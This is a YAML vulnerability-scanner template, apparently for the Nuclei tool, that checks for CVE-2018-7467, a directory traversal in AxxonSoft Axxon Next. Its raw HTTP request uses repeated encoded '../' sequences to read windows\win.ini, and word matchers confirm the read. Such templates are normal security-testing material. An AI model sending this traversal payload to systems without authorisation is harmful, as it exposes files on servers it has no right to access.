32 lines
914 B
YAML
32 lines
914 B
YAML
|
id: CVE-2018-7467
|
||
|
info:
|
||
|
name: AxxonSoft Axxon Next Directory Traversal
|
||
|
author: 0x_Akoko
|
||
|
severity: high
|
||
|
description: AxxonSoft Axxon Next suffers from a directory traversal vulnerability.
|
||
|
reference:
|
||
|
- https://packetstormsecurity.com/files/146604/AxxonSoft-Axxon-Next-Directory-Traversal.html
|
||
|
- https://nvd.nist.gov/vuln/detail/CVE-2018-7467
|
||
|
classification:
|
||
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||
|
cvss-score: 7.5
|
||
|
cve-id: CVE-2018-7467
|
||
|
cwe-id: CWE-200
|
||
|
tags: cve,cve2018,axxonsoft,lfi
|
||
|
|
||
|
requests:
|
||
|
- raw:
|
||
|
- |+
|
||
|
GET //css//..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows\win.ini HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
unsafe: true
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- "bit app support"
|
||
|
- "fonts"
|
||
|
- "extensions"
|
||
|
condition: and
|